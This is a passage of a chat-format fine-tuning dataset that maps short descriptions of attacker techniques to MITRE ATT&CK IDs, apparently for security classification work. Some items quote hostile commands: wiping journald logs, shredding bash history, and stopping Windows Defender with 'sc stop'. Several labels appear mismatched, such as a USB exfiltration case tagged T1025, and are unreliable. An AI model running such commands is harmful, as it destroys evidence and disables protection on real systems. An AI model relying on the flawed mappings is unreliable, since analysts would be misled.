- "content": "T1498.001 - Network Denial of Service: Direct Network Flood"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The adversary exploits a zero‑day vulnerability in SharePoint to bypass authentication and harvest documents."
- },
- {
- "role": "assistant",
- "content": "T1213.002 - Data from Information Repositories: Sharepoint"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Adversary embeds command data in the User‑Agent string of regular web browsing traffic."
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The attacker used a shell pipeline to pipe the output of 'ps' into a remote listener for live process monitoring."
- },
- {
- "role": "assistant",
- "content": "T1059.004 - Command and Scripting Interpreter: Unix Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "By leveraging stolen NTLM hashes, the threat actor performs Pass-the-Hash to authenticate on other domain machines."
- },
- {
- "role": "assistant",
- "content": "T1550.002 - Use Alternate Authentication Material: Pass the Hash"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "An intruder runs `net share` to reveal locally hosted shares on the compromised machine."
- },
- {
- "role": "assistant",
- "content": "T1135 - Network Share Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The intrusion framework injects code into user processes to capture typed commands and passwords via keylogging techniques."
- },
- {
- "role": "assistant",
- "content": "T1056.001 - Input Capture: Keylogging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Adversaries install a malicious Windows Server that mimics the legitimate Active Directory domain controller to intercept authentication requests."
- },
- {
- "role": "assistant",
- "content": "T1207 - Rogue Domain Controller"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Deploying a malicious container through a compromised Swarm manager node."
- },
- {
- "role": "assistant",
- "content": "T1610 - Deploy Container"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Adversary exploits a vulnerability to alter the Kerberos ticket-granting service, allowing pass-the-ticket attacks."
- },
- {
- "role": "assistant",
- "content": "T1556 - Modify Authentication Process"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The threat actor gains administrative rights on a Windows domain controller and modifies the authentication process to allow lateral movement using forged Kerberos tickets."
- },
- {
- "role": "assistant",
- "content": "T1556.001 - Modify Authentication Process: Domain Controller Authentication"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The attacker provisions virtual machines in an obsolete AWS region to avoid corporate policy rules."
- },
- {
- "role": "assistant",
- "content": "T1535 - Unused/Unsupported Cloud Regions"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Threat actor exploits the Azure Instance Metadata Service to steal VM access tokens."
- },
- {
- "role": "assistant",
- "content": "T1552.005 - Unsecured Credentials: Cloud Instance Metadata API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The adversary accessed stored credentials in the Microsoft Edge password repository by exploiting a privilege escalation bug."
- },
- {
- "role": "assistant",
- "content": "T1555 - Credentials from Password Stores"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The adversary uses malformed SMB packets to crash the file sharing service on a corporate server, causing a denial of service for all clients."
- },
- {
- "role": "assistant",
- "content": "T1499.004 - Endpoint Denial of Service: Application or System Exploitation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The adversary abuses the Windows PATH search order by placing a malicious 'cmd.exe' in a directory that appears earlier in an unquoted path, resulting in command execution hijacking."
- },
- {
- "role": "assistant",
- "content": "T1574.009 - Hijack Execution Flow: Path Interception by Unquoted Path"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A malicious script queries the registry for CPU architecture and BIOS information to build a system profile."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Adversaries leveraged mass traceroute commands to profile the victim's network topology and active IP blocks."
- },
- {
- "role": "assistant",
- "content": "T1595.001 - Active Scanning: Scanning IP Blocks"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Adversaries employ a custom encoder that represents data in base64 strings, each staying under the 4 KB limit for outbound traffic."
- },
- {
- "role": "assistant",
- "content": "T1030 - Data Transfer Size Limits"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The actor initiates a DCOM-based RPC to control services on a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1021.003 - Remote Services: Distributed Component Object Model"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The Trojan caches stolen data in a remote Git repository."
- },
- {
- "role": "assistant",
- "content": "T1074.002 - Data Staged: Remote Data Staging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Malware scans the file system for PEM-encoded private keys and uploads them to a command-and-control server for later use."
- },
- {
- "role": "assistant",
- "content": "T1552.004 - Unsecured Credentials: Private Keys"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Threat actor modifies the code signing verification registry keys to bypass signature checks for executables."
- },
- {
- "role": "assistant",
- "content": "T1553.006 - Subvert Trust Controls: Code Signing Policy Modification"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The attacker obtains the NTDS.dit file from the %systemroot%\\NTDS folder to extract user password hashes."
- },
- {
- "role": "assistant",
- "content": "T1003.003 - OS Credential Dumping: NTDS"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The actor crafts malformed XPC messages that cause a privileged service to load a malicious library, achieving code execution."
- },
- {
- "role": "assistant",
- "content": "T1559.003 - Inter-Process Communication: XPC Services"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The threat actor compressed the malicious executable into a password-protected ZIP archive."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The group obtains a proprietary exploit for a recently patched kernel vulnerability and incorporates it into their weaponized malware."
- },
- {
- "role": "assistant",
- "content": "T1588.005 - Obtain Capabilities: Exploits"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Using a man‑in‑the‑middle proxy, the attacker intercepts and captures OAuth2 tokens transmitted between a web client and the authentication server."
- },
- {
- "role": "assistant",
- "content": "T1528 - Steal Application Access Token"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The intrusion set employs a custom decoder to translate XOR‑encrypted configuration files into plaintext."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The attacker leverages a stolen domain admin credential to modify Group Policy Objects, inserting a malicious startup script that executes on every domain-joined host."
- },
- {
- "role": "assistant",
- "content": "T1484.001 - Domain Policy Modification: Group Policy Modification"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Malware creates a hidden user with elevated privileges to maintain persistence."
- },
- {
- "role": "assistant",
- "content": "T1136 - Create Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Malicious actor signs up for a Microsoft Outlook account using synthetic personal information to hide their identity."
- },
- {
- "role": "assistant",
- "content": "T1585.002 - Establish Accounts: Email Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT group exploits a misconfiguration in the SAML token validator to inject forged credentials."
- },
- {
- "role": "assistant",
- "content": "T1606.002 - Forge Web Credentials: SAML Tokens"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A hacker exfiltrates system configuration files by writing them to a USB‑C hard drive plugged into the target PC."
- },
- {
- "role": "assistant",
- "content": "T1025 - Data from Removable Media"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The malware harvests stored local passwords and logs in using those credentials to maintain control."
- },
- {
- "role": "assistant",
- "content": "T1078.003 - Valid Accounts: Local Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A threat actor uses DNS zone transfers to retrieve a list of all machines within the target's domain."
- },
- {
- "role": "assistant",
- "content": "T1590.002 - Gather Victim Network Information: DNS"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Intruder accessed victim's environment via Azure Bastion, enabling interactive RDP sessions over the internet."
- },
- {
- "role": "assistant",
- "content": "T1021.007 - Remote Services: Cloud Services"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "After compromising a privileged account, the threat actor hijacks an existing RDP connection to execute commands on the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1563.002 - Remote Service Session Hijacking: RDP Hijacking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The ransomware inspects CPU information for hypervisor signatures and aborts if it detects a known sandbox."
- },
- {
- "role": "assistant",
- "content": "T1497.001 - Virtualization/Sandbox Evasion: System Checks"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The attacker modifies the Print Processor configuration to point to a malicious DLL, which is executed with system privileges each time the print service starts."
- },
- {
- "role": "assistant",
- "content": "T1547.012 - Boot or Logon Autostart Execution: Print Processors"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A compromised container in a Kubernetes pod calls the host's cloud metadata endpoint to extract temporary cloud credentials, leveraging the default network route to 169.254.169.254."
- },
- {
- "role": "assistant",
- "content": "T1552.005 - Unsecured Credentials: Cloud Instance Metadata API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Malware authors acquire a legitimate developer's code signing key through phishing and sign their ransomware payloads, making them appear trusted to endpoint protection solutions."
- },
- {
- "role": "assistant",
- "content": "T1553.002 - Subvert Trust Controls: Code Signing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Virus modifies the LaunchAgents plist to schedule a repeated execution of a cryptominer."
- },
- {
- "role": "assistant",
- "content": "T1647 - Plist File Modification"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Using hidden or disguised windows for unauthorized access"
- },
- {
- "role": "assistant",
- "content": "T1564.003 - Hide Artifacts: Hidden Window"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During the attack, the hacker cleared journalctl logs using \"journalctl --rotate && journalctl --vacuum-time=1s\" on a Linux server."
- },
- {
- "role": "assistant",
- "content": "T1070.002 - Indicator Removal: Clear Linux or Mac System Logs"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Using LNK icon smuggling, the attacker hides malicious code inside the icon resource of a shortcut, bypassing file inspection."
- },
- {
- "role": "assistant",
- "content": "T1027.012 - Obfuscated Files or Information: LNK Icon Smuggling"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The threat group uses a web service’s request/response mechanism for continuous two‑way data exchange, sending operational directives and receiving exfiltrated files in the same session."
- },
- {
- "role": "assistant",
- "content": "T1102.002 - Web Service: Bidirectional Communication"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Adversaries employed public cloud APIs, such as Dropbox and Google Drive, as a covert channel for command and control communication."
- },
- {
- "role": "assistant",
- "content": "T1102 - Web Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The threat actor accesses a paid legal database to locate patents and litigation documents concerning the target company's proprietary technologies."
- },
- {
- "role": "assistant",
- "content": "T1597 - Search Closed Sources"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A post‑exploitation module runs \"reg query HKLM\\Hardware\\Description\\System\\BIOS\" to collect firmware metadata from the registry."
- },
- {
- "role": "assistant",
- "content": "T1592.003 - Gather Victim Host Information: Firmware"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The actor acquired a DNS server to facilitate the use of custom top‑level domains for stealthy C2 communication."
- },
- {
- "role": "assistant",
- "content": "T1583.002 - Acquire Infrastructure: DNS Server"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Threat actors harvest clear‑text credentials from Group Policy Preference XML files left on the file system."
- },
- {
- "role": "assistant",
- "content": "T1552.006 - Unsecured Credentials: Group Policy Preferences"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The adversary enumerates container network interfaces by listing \"eth0\" through \"ifconfig\" inside the container."
- },
- {
- "role": "assistant",
- "content": "T1613 - Container and Resource Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The intrusion used a Python one‑liner to modify Windows registry keys for persistence."
- },
- {
- "role": "assistant",
- "content": "T1059.006 - Command and Scripting Interpreter: Python"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "An attacker exploits a known CVE to downgrade the operating system's security patches, rolling back to an older, vulnerable kernel."
- },
- {
- "role": "assistant",
- "content": "T1562.010 - Impair Defenses: Downgrade Attack"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Malicious code accesses the \\\\??\\C:\\Windows\\System32\\config\\SAM file directly and copies it to a staging directory before extracting password hashes."
- },
- {
- "role": "assistant",
- "content": "T1003.002 - OS Credential Dumping: Security Account Manager"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The threat actor uses the 'crontab -e' command to schedule a JavaScript file that launches a reverse shell daily at 3 AM."
- },
- {
- "role": "assistant",
- "content": "T1053.003 - Scheduled Task/Job: Cron"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A malicious payload is inserted into a Mustache template, causing the application to evaluate and run the payload."
- },
- {
- "role": "assistant",
- "content": "T1221 - Template Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "An attacker launches a hidden GUI window with the WS_EX_TOOLWINDOW style to avoid appearing in the taskbar or Alt‑Tab menu."
- },
- {
- "role": "assistant",
- "content": "T1564.003 - Hide Artifacts: Hidden Window"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Replacing the legitimate network provider DLL with a back‑doored version enables the attacker to harvest and alter authentication information."
- },
- {
- "role": "assistant",
- "content": "T1556.008 - Modify Authentication Process: Network Provider DLL"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The compromise script runs \"shred -u ~/.bash_history\" to securely delete the command history file."
- },
- {
- "role": "assistant",
- "content": "T1070.003 - Indicator Removal: Clear Command History"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The threat actor uses the \"sc stop\" command to halt the Windows Defender Antivirus service, preventing real-time protection."
- },
- {
- "role": "assistant",
- "content": "T1489 - Service Stop"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The operative used SNMP tools to enumerate MIB objects, extracting password hashes stored in device configuration files."
- },
- {
- "role": "assistant",
- "content": "T1602.001 - Data from Configuration Repository: SNMP (MIB Dump)"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "An adversary uses a public search engine to locate exposed .env files containing configuration details."
- },
- {
- "role": "assistant",
- "content": "T1593.002 - Search Open Websites/Domains: Search Engines"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The threat actor embeds malicious shellcode inside a JPEG image uploaded to a public image‑hosting site, retrieving it later to execute on the target system."
- },
- {
- "role": "assistant",
- "content": "T1001.002 - Data Obfuscation: Steganography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The threat actor modifies the payload to resemble standard DNS queries, making the malicious communication blend in with normal DNS traffic."
- },
- {
- "role": "assistant",
- "content": "T1001.003 - Data Obfuscation: Protocol Impersonation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The intrusion modifies the systemd unit for a logging service to exfiltrate logs to a remote server."
- },
- {
- "role": "assistant",
- "content": "T1543.002 - Create or Modify System Process: Systemd Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A malicious script leverages the Alibaba Cloud ECS DeleteInstance API to destroy a running instance."
- },
- {
- "role": "assistant",
- "content": "T1578.003 - Modify Cloud Compute Infrastructure: Delete Cloud Instance"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The intruder adjusted the \"Network Access: Restrict anonymous access\" setting in the domain policy to \"Disabled\", facilitating anonymous enumeration of network shares."
- },
- {
- "role": "assistant",
- "content": "T1484.001 - Domain Policy Modification: Group Policy Modification"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Malware registers a malicious HTTP module in IIS, allowing it to intercept and modify HTTP requests to exfiltrate sensitive data."
- },
- {
- "role": "assistant",
- "content": "T1505.004 - Server Software Component: IIS Components"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The intrusion script inserts a new user into /etc/passwd with root privileges on Linux."
- },
- {
- "role": "assistant",
- "content": "T1136 - Create Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Supply chain compromise of a graphics card vendor’s firmware update utility, delivering a malicious payload that escalates privileges on victim machines."
- },
- {
- "role": "assistant",
- "content": "T1195.003 - Supply Chain Compromise: Compromise Hardware Supply Chain"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The attacker exploited a deserialization bug in the web application to execute code that altered site content to a defaced state."
- },
- {
- "role": "assistant",
- "content": "T1491.002 - Defacement: External Defacement"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Threat actors leverage Azure Virtual Desktop to establish remote sessions on compromised workstations without exposing network ports."
- },
- {
- "role": "assistant",
- "content": "T1021.007 - Remote Services: Cloud Services"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The intrusion set utilizes social media messaging platforms, sending direct messages to compromised accounts to issue commands."
- },
- {
- "role": "assistant",
- "content": "T1102.003 - Web Service: One-Way Communication"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The spyware opens the volume device in raw mode and copies the entire disk image to a remote server."
- },
- {
- "role": "assistant",
- "content": "T1006 - Direct Volume Access"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The attacker injects a custom debugger path into the IFEO registry for svchost.exe, leveraging Image File Execution Options to execute malicious code when the system service runs."
- },
